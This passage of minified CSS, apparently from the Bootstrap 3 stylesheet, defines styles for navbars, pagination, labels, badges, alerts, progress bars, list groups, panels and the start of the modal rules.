.btn-link[disabled]:focus,.navbar-default .btn-link[disabled]:hover,fieldset[disabled] .navbar-default .btn-link:focus,fieldset[disabled] .navbar-default .btn-link:hover{color:#ccc}.navbar-inverse{background-color:#222;border-color:#080808}.navbar-inverse .navbar-brand{color:#9d9d9d}.navbar-inverse .navbar-brand:focus,.navbar-inverse .navbar-brand:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-text{color:#9d9d9d}.navbar-inverse .navbar-nav>li>a{color:#9d9d9d}.navbar-inverse .navbar-nav>li>a:focus,.navbar-inverse .navbar-nav>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:focus,.navbar-inverse .navbar-nav>.active>a:hover{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:focus,.navbar-inverse .navbar-nav>.disabled>a:hover{color:#444;background-color:transparent}.navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:focus,.navbar-inverse .navbar-nav>.open>a:hover{color:#fff;background-color:#080808}@media (max-width:767px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu .divider{background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#9d9d9d}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#444;background-color:transparent}}.navbar-inverse .navbar-toggle{border-color:#333}.navbar-inverse .navbar-toggle:focus,.navbar-inverse .navbar-toggle:hover{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#101010}.navbar-inverse .navbar-link{color:#9d9d9d}.navbar-inverse .navbar-link:hover{color:#fff}.navbar-inverse .btn-link{color:#9d9d9d}.navbar-inverse .btn-link:focus,.navbar-inverse .btn-link:hover{color:#fff}.navbar-inverse .btn-link[disabled]:focus,.navbar-inverse .btn-link[disabled]:hover,fieldset[disabled] .navbar-inverse .btn-link:focus,fieldset[disabled] .navbar-inverse .btn-link:hover{color:#444}.breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}.breadcrumb>li{display:inline-block}.breadcrumb>li+li:before{padding:0 5px;color:#ccc;content:"/\00a0"}.breadcrumb>.active{color:#777}.pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}.pagination>li{display:inline}.pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;margin-left:-1px;line-height:1.42857143;color:#337ab7;text-decoration:none;background-color:#fff;border:1px solid #ddd}.pagination>li>a:focus,.pagination>li>a:hover,.pagination>li>span:focus,.pagination>li>span:hover{z-index:2;color:#23527c;background-color:#eee;border-color:#ddd}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-top-left-radius:4px;border-bottom-left-radius:4px}.pagination>li:last-child>a,.pagination>li:last-child>span{border-top-right-radius:4px;border-bottom-right-radius:4px}.pagination>.active>a,.pagination>.active>a:focus,.pagination>.active>a:hover,.pagination>.active>span,.pagination>.active>span:focus,.pagination>.active>span:hover{z-index:3;color:#fff;cursor:default;background-color:#337ab7;border-color:#337ab7}.pagination>.disabled>a,.pagination>.disabled>a:focus,.pagination>.disabled>a:hover,.pagination>.disabled>span,.pagination>.disabled>span:focus,.pagination>.disabled>span:hover{color:#777;cursor:not-allowed;background-color:#fff;border-color:#ddd}.pagination-lg>li>a,.pagination-lg>li>span{padding:10px 16px;font-size:18px;line-height:1.3333333}.pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-top-left-radius:6px;border-bottom-left-radius:6px}.pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-top-right-radius:6px;border-bottom-right-radius:6px}.pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px;line-height:1.5}.pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-top-left-radius:3px;border-bottom-left-radius:3px}.pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-top-right-radius:3px;border-bottom-right-radius:3px}.pager{padding-left:0;margin:20px 0;text-align:center;list-style:none}.pager li{display:inline}.pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}.pager li>a:focus,.pager li>a:hover{text-decoration:none;background-color:#eee}.pager .next>a,.pager .next>span{float:right}.pager .previous>a,.pager .previous>span{float:left}.pager .disabled>a,.pager .disabled>a:focus,.pager .disabled>a:hover,.pager .disabled>span{color:#777;cursor:not-allowed;background-color:#fff}.label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}a.label:focus,a.label:hover{color:#fff;text-decoration:none;cursor:pointer}.label:empty{display:none}.btn .label{position:relative;top:-1px}.label-default{background-color:#777}.label-default[href]:focus,.label-default[href]:hover{background-color:#5e5e5e}.label-primary{background-color:#337ab7}.label-primary[href]:focus,.label-primary[href]:hover{background-color:#286090}.label-success{background-color:#5cb85c}.label-success[href]:focus,.label-success[href]:hover{background-color:#449d44}.label-info{background-color:#5bc0de}.label-info[href]:focus,.label-info[href]:hover{background-color:#31b0d5}.label-warning{background-color:#f0ad4e}.label-warning[href]:focus,.label-warning[href]:hover{background-color:#ec971f}.label-danger{background-color:#d9534f}.label-danger[href]:focus,.label-danger[href]:hover{background-color:#c9302c}.badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.badge:empty{display:none}.btn .badge{position:relative;top:-1px}.btn-group-xs>.btn .badge,.btn-xs .badge{top:0;padding:1px 5px}a.badge:focus,a.badge:hover{color:#fff;text-decoration:none;cursor:pointer}.list-group-item.active>.badge,.nav-pills>.active>a>.badge{color:#337ab7;background-color:#fff}.list-group-item>.badge{float:right}.list-group-item>.badge+.badge{margin-right:5px}.nav-pills>li>a>.badge{margin-left:3px}.jumbotron{padding-top:30px;padding-bottom:30px;margin-bottom:30px;color:inherit;background-color:#eee}.jumbotron .h1,.jumbotron h1{color:inherit}.jumbotron p{margin-bottom:15px;font-size:21px;font-weight:200}.jumbotron>hr{border-top-color:#d5d5d5}.container .jumbotron,.container-fluid .jumbotron{padding-right:15px;padding-left:15px;border-radius:6px}.jumbotron .container{max-width:100%}@media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}.container .jumbotron,.container-fluid .jumbotron{padding-right:60px;padding-left:60px}.jumbotron .h1,.jumbotron h1{font-size:63px}}.thumbnail{display:block;padding:4px;margin-bottom:20px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:border .2s ease-in-out;-o-transition:border .2s ease-in-out;transition:border .2s ease-in-out}.thumbnail a>img,.thumbnail>img{margin-right:auto;margin-left:auto}a.thumbnail.active,a.thumbnail:focus,a.thumbnail:hover{border-color:#337ab7}.thumbnail .caption{padding:9px;color:#333}.alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}.alert h4{margin-top:0;color:inherit}.alert .alert-link{font-weight:700}.alert>p,.alert>ul{margin-bottom:0}.alert>p+p{margin-top:5px}.alert-dismissable,.alert-dismissible{padding-right:35px}.alert-dismissable .close,.alert-dismissible .close{position:relative;top:-2px;right:-21px;color:inherit}.alert-success{color:#3c763d;background-color:#dff0d8;border-color:#d6e9c6}.alert-success hr{border-top-color:#c9e2b3}.alert-success .alert-link{color:#2b542c}.alert-info{color:#31708f;background-color:#d9edf7;border-color:#bce8f1}.alert-info hr{border-top-color:#a6e1ec}.alert-info .alert-link{color:#245269}.alert-warning{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}.alert-warning hr{border-top-color:#f7e1b5}.alert-warning .alert-link{color:#66512c}.alert-danger{color:#a94442;background-color:#f2dede;border-color:#ebccd1}.alert-danger hr{border-top-color:#e4b9c0}.alert-danger .alert-link{color:#843534}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.progress{height:20px;margin-bottom:20px;overflow:hidden;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}.progress-bar{float:left;width:0%;height:100%;font-size:12px;line-height:20px;color:#fff;text-align:center;background-color:#337ab7;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);-webkit-transition:width .6s ease;-o-transition:width .6s ease;transition:width .6s ease}.progress-bar-striped,.progress-striped .progress-bar{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);-webkit-background-size:40px 40px;background-size:40px 40px}.progress-bar.active,.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}.progress-bar-success{background-color:#5cb85c}.progress-striped .progress-bar-success{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-info{background-color:#5bc0de}.progress-striped .progress-bar-info{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-warning{background-color:#f0ad4e}.progress-striped .progress-bar-warning{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.progress-bar-danger{background-color:#d9534f}.progress-striped .progress-bar-danger{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.media{margin-top:15px}.media:first-child{margin-top:0}.media,.media-body{overflow:hidden;zoom:1}.media-body{width:10000px}.media-object{display:block}.media-object.img-thumbnail{max-width:none}.media-right,.media>.pull-right{padding-left:10px}.media-left,.media>.pull-left{padding-right:10px}.media-body,.media-left,.media-right{display:table-cell;vertical-align:top}.media-middle{vertical-align:middle}.media-bottom{vertical-align:bottom}.media-heading{margin-top:0;margin-bottom:5px}.media-list{padding-left:0;list-style:none}.list-group{padding-left:0;margin-bottom:20px}.list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}.list-group-item:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.list-group-item.disabled,.list-group-item.disabled:focus,.list-group-item.disabled:hover{color:#777;cursor:not-allowed;background-color:#eee}.list-group-item.disabled .list-group-item-heading,.list-group-item.disabled:focus .list-group-item-heading,.list-group-item.disabled:hover .list-group-item-heading{color:inherit}.list-group-item.disabled .list-group-item-text,.list-group-item.disabled:focus .list-group-item-text,.list-group-item.disabled:hover .list-group-item-text{color:#777}.list-group-item.active,.list-group-item.active:focus,.list-group-item.active:hover{z-index:2;color:#fff;background-color:#337ab7;border-color:#337ab7}.list-group-item.active .list-group-item-heading,.list-group-item.active .list-group-item-heading>.small,.list-group-item.active .list-group-item-heading>small,.list-group-item.active:focus .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading>.small,.list-group-item.active:focus .list-group-item-heading>small,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading>.small,.list-group-item.active:hover .list-group-item-heading>small{color:inherit}.list-group-item.active .list-group-item-text,.list-group-item.active:focus .list-group-item-text,.list-group-item.active:hover .list-group-item-text{color:#c7ddef}a.list-group-item,button.list-group-item{color:#555}a.list-group-item .list-group-item-heading,button.list-group-item .list-group-item-heading{color:#333}a.list-group-item:focus,a.list-group-item:hover,button.list-group-item:focus,button.list-group-item:hover{color:#555;text-decoration:none;background-color:#f5f5f5}button.list-group-item{width:100%;text-align:left}.list-group-item-success{color:#3c763d;background-color:#dff0d8}a.list-group-item-success,button.list-group-item-success{color:#3c763d}a.list-group-item-success .list-group-item-heading,button.list-group-item-success .list-group-item-heading{color:inherit}a.list-group-item-success:focus,a.list-group-item-success:hover,button.list-group-item-success:focus,button.list-group-item-success:hover{color:#3c763d;background-color:#d0e9c6}a.list-group-item-success.active,a.list-group-item-success.active:focus,a.list-group-item-success.active:hover,button.list-group-item-success.active,button.list-group-item-success.active:focus,button.list-group-item-success.active:hover{color:#fff;background-color:#3c763d;border-color:#3c763d}.list-group-item-info{color:#31708f;background-color:#d9edf7}a.list-group-item-info,button.list-group-item-info{color:#31708f}a.list-group-item-info .list-group-item-heading,button.list-group-item-info .list-group-item-heading{color:inherit}a.list-group-item-info:focus,a.list-group-item-info:hover,button.list-group-item-info:focus,button.list-group-item-info:hover{color:#31708f;background-color:#c4e3f3}a.list-group-item-info.active,a.list-group-item-info.active:focus,a.list-group-item-info.active:hover,button.list-group-item-info.active,button.list-group-item-info.active:focus,button.list-group-item-info.active:hover{color:#fff;background-color:#31708f;border-color:#31708f}.list-group-item-warning{color:#8a6d3b;background-color:#fcf8e3}a.list-group-item-warning,button.list-group-item-warning{color:#8a6d3b}a.list-group-item-warning .list-group-item-heading,button.list-group-item-warning .list-group-item-heading{color:inherit}a.list-group-item-warning:focus,a.list-group-item-warning:hover,button.list-group-item-warning:focus,button.list-group-item-warning:hover{color:#8a6d3b;background-color:#faf2cc}a.list-group-item-warning.active,a.list-group-item-warning.active:focus,a.list-group-item-warning.active:hover,button.list-group-item-warning.active,button.list-group-item-warning.active:focus,button.list-group-item-warning.active:hover{color:#fff;background-color:#8a6d3b;border-color:#8a6d3b}.list-group-item-danger{color:#a94442;background-color:#f2dede}a.list-group-item-danger,button.list-group-item-danger{color:#a94442}a.list-group-item-danger .list-group-item-heading,button.list-group-item-danger .list-group-item-heading{color:inherit}a.list-group-item-danger:focus,a.list-group-item-danger:hover,button.list-group-item-danger:focus,button.list-group-item-danger:hover{color:#a94442;background-color:#ebcccc}a.list-group-item-danger.active,a.list-group-item-danger.active:focus,a.list-group-item-danger.active:hover,button.list-group-item-danger.active,button.list-group-item-danger.active:focus,button.list-group-item-danger.active:hover{color:#fff;background-color:#a94442;border-color:#a94442}.list-group-item-heading{margin-top:0;margin-bottom:5px}.list-group-item-text{margin-bottom:0;line-height:1.3}.panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.05);box-shadow:0 1px 1px rgba(0,0,0,.05)}.panel-body{padding:15px}.panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-left-radius:3px;border-top-right-radius:3px}.panel-heading>.dropdown .dropdown-toggle{color:inherit}.panel-title{margin-top:0;margin-bottom:0;font-size:16px;color:inherit}.panel-title>.small,.panel-title>.small>a,.panel-title>a,.panel-title>small,.panel-title>small>a{color:inherit}.panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.list-group,.panel>.panel-collapse>.list-group{margin-bottom:0}.panel>.list-group .list-group-item,.panel>.panel-collapse>.list-group .list-group-item{border-width:1px 0;border-radius:0}.panel>.list-group:first-child .list-group-item:first-child,.panel>.panel-collapse>.list-group:first-child .list-group-item:first-child{border-top:0;border-top-left-radius:3px;border-top-right-radius:3px}.panel>.list-group:last-child .list-group-item:last-child,.panel>.panel-collapse>.list-group:last-child .list-group-item:last-child{border-bottom:0;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.panel-heading+.panel-collapse>.list-group .list-group-item:first-child{border-top-left-radius:0;border-top-right-radius:0}.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}.list-group+.panel-footer{border-top-width:0}.panel>.panel-collapse>.table,.panel>.table,.panel>.table-responsive>.table{margin-bottom:0}.panel>.panel-collapse>.table caption,.panel>.table caption,.panel>.table-responsive>.table caption{padding-right:15px;padding-left:15px}.panel>.table-responsive:first-child>.table:first-child,.panel>.table:first-child{border-top-left-radius:3px;border-top-right-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child,.panel>.table:first-child>thead:first-child>tr:first-child{border-top-left-radius:3px;border-top-right-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table:first-child>thead:first-child>tr:first-child th:first-child{border-top-left-radius:3px}.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table:first-child>thead:first-child>tr:first-child th:last-child{border-top-right-radius:3px}.panel>.table-responsive:last-child>.table:last-child,.panel>.table:last-child{border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child{border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:first-child{border-bottom-left-radius:3px}.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:last-child{border-bottom-right-radius:3px}.panel>.panel-body+.table,.panel>.panel-body+.table-responsive,.panel>.table+.panel-body,.panel>.table-responsive+.panel-body{border-top:1px solid #ddd}.panel>.table>tbody:first-child>tr:first-child td,.panel>.table>tbody:first-child>tr:first-child th{border-top:0}.panel>.table-bordered,.panel>.table-responsive>.table-bordered{border:0}.panel>.table-bordered>tbody>tr>td:first-child,.panel>.table-bordered>tbody>tr>th:first-child,.panel>.table-bordered>tfoot>tr>td:first-child,.panel>.table-bordered>tfoot>tr>th:first-child,.panel>.table-bordered>thead>tr>td:first-child,.panel>.table-bordered>thead>tr>th:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:first-child,.panel>.table-responsive>.table-bordered>thead>tr>td:first-child,.panel>.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}.panel>.table-bordered>tbody>tr>td:last-child,.panel>.table-bordered>tbody>tr>th:last-child,.panel>.table-bordered>tfoot>tr>td:last-child,.panel>.table-bordered>tfoot>tr>th:last-child,.panel>.table-bordered>thead>tr>td:last-child,.panel>.table-bordered>thead>tr>th:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:last-child,.panel>.table-responsive>.table-bordered>thead>tr>td:last-child,.panel>.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}.panel>.table-bordered>tbody>tr:first-child>td,.panel>.table-bordered>tbody>tr:first-child>th,.panel>.table-bordered>thead>tr:first-child>td,.panel>.table-bordered>thead>tr:first-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>th,.panel>.table-responsive>.table-bordered>thead>tr:first-child>td,.panel>.table-responsive>.table-bordered>thead>tr:first-child>th{border-bottom:0}.panel>.table-bordered>tbody>tr:last-child>td,.panel>.table-bordered>tbody>tr:last-child>th,.panel>.table-bordered>tfoot>tr:last-child>td,.panel>.table-bordered>tfoot>tr:last-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>th,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>td,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>th{border-bottom:0}.panel>.table-responsive{margin-bottom:0;border:0}.panel-group{margin-bottom:20px}.panel-group .panel{margin-bottom:0;border-radius:4px}.panel-group .panel+.panel{margin-top:5px}.panel-group .panel-heading{border-bottom:0}.panel-group .panel-heading+.panel-collapse>.list-group,.panel-group .panel-heading+.panel-collapse>.panel-body{border-top:1px solid #ddd}.panel-group .panel-footer{border-top:0}.panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}.panel-default{border-color:#ddd}.panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}.panel-default>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ddd}.panel-default>.panel-heading .badge{color:#f5f5f5;background-color:#333}.panel-default>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ddd}.panel-primary{border-color:#337ab7}.panel-primary>.panel-heading{color:#fff;background-color:#337ab7;border-color:#337ab7}.panel-primary>.panel-heading+.panel-collapse>.panel-body{border-top-color:#337ab7}.panel-primary>.panel-heading .badge{color:#337ab7;background-color:#fff}.panel-primary>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#337ab7}.panel-success{border-color:#d6e9c6}.panel-success>.panel-heading{color:#3c763d;background-color:#dff0d8;border-color:#d6e9c6}.panel-success>.panel-heading+.panel-collapse>.panel-body{border-top-color:#d6e9c6}.panel-success>.panel-heading .badge{color:#dff0d8;background-color:#3c763d}.panel-success>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#d6e9c6}.panel-info{border-color:#bce8f1}.panel-info>.panel-heading{color:#31708f;background-color:#d9edf7;border-color:#bce8f1}.panel-info>.panel-heading+.panel-collapse>.panel-body{border-top-color:#bce8f1}.panel-info>.panel-heading .badge{color:#d9edf7;background-color:#31708f}.panel-info>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#bce8f1}.panel-warning{border-color:#faebcc}.panel-warning>.panel-heading{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}.panel-warning>.panel-heading+.panel-collapse>.panel-body{border-top-color:#faebcc}.panel-warning>.panel-heading .badge{color:#fcf8e3;background-color:#8a6d3b}.panel-warning>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#faebcc}.panel-danger{border-color:#ebccd1}.panel-danger>.panel-heading{color:#a94442;background-color:#f2dede;border-color:#ebccd1}.panel-danger>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ebccd1}.panel-danger>.panel-heading .badge{color:#f2dede;background-color:#a94442}.panel-danger>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ebccd1}.embed-responsive{position:relative;display:block;height:0;padding:0;overflow:hidden}.embed-responsive .embed-responsive-item,.embed-responsive embed,.embed-responsive iframe,.embed-responsive object,.embed-responsive video{position:absolute;top:0;bottom:0;left:0;width:100%;height:100%;border:0}.embed-responsive-16by9{padding-bottom:56.25%}.embed-responsive-4by3{padding-bottom:75%}.well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.05);box-shadow:inset 0 1px 1px rgba(0,0,0,.05)}.well blockquote{border-color:#ddd;border-color:rgba(0,0,0,.15)}.well-lg{padding:24px;border-radius:6px}.well-sm{padding:9px;border-radius:3px}.close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;filter:alpha(opacity=20);opacity:.2}.close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;filter:alpha(opacity=50);opacity:.5}button.close{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none;-moz-appearance:none;appearance:none}.modal-open{overflow:hidden}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1050;display:none;overflow:hidden;-webkit-overflow-scrolling:touch;outline:0}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);-o-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out,-o-transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);-o-transform:translate(0,0);transform:translate(0,0)}.modal-open .modal{overflow-x:hidden;overflow-y:auto}.modal-dialog{position:relative;width:auto;margin:10px}.modal-content{position:relative;background-color:#fff;background-clip:padding-box;border:1px solid #999;border:1px solid rgba(0,0,0,.2);border-radius:6px;-webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);box-shadow:0 3px 9px rgba(0,0,0,.5);outline:0}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000}.modal-backdrop.fade{filter:alpha(opacity=0);opacity:0}.modal-backdrop.in{filter:alpha(opacity=50);opacity:.5}.modal-header{padding:15px;border-bottom:1px solid #e5e5e5}.modal-header 